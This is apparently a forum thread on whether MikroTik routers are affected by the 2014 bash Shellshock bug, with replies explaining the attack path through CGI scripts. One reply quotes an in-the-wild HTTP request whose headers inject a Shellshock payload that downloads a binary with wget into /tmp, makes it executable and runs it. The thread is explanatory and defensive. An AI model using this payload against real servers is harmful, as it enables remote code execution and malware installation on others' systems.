with the recent announcements of attacks being open in the wild is mikrotik affected by this bug?
If so is their a patch in the works?
I would like to know this as well I am assuming the Mikrotik is vulnerable.
Thanks,
-tb
If I understand the bug correctly, the problem is that specifically crafted environment variables can turn into executable code.
If that’s the case, then surely MikroTik is not affected, since at no point does it let the user run custom executable files on it, let alone execute them with environment variables.
The only way in which I could see MikroTik possibly being affected is if the CLI parser is a front-end to what eventually becomes a bash command with environment variables, where the environment variables are actually the command arguments. If that’s the case, then perhaps some cleverly crafted arguments could trigger custom executable code… But to actually exploit this hypothetical vulnerability, one needs to have access to the router to begin with.
EDIT: Aaaannd… Like I thought… No bash involved.
That’s the only saving grace, as a system doesn’t have to allow custom executables to be vulnerable. Imagine this scenario:
- You send the following query to a web server. The headers automatically get dumped into environmental variables, for later use by CGI scripts.
GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http:///nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http:///nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http:///nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:./
-
The get request leads to a CGI script, let’s say in Perl.
-
Perl needs to make a change somewhere, and for convenience does it via a “system()” call, which executes bash.
-
Bash has now been run with an exploit in its environmental variables. Game, set, match.
Apparently there’s a similar mechanism in the dhclient daemon.
See:
https://isc.sans.edu/forums/diary/Update+on+CVE-2014-6271+Vulnerability+in+bash+shellshock+/18707
https://github.com/CriticalStack/bro-scripts/tree/master/bash-cve-2014-6271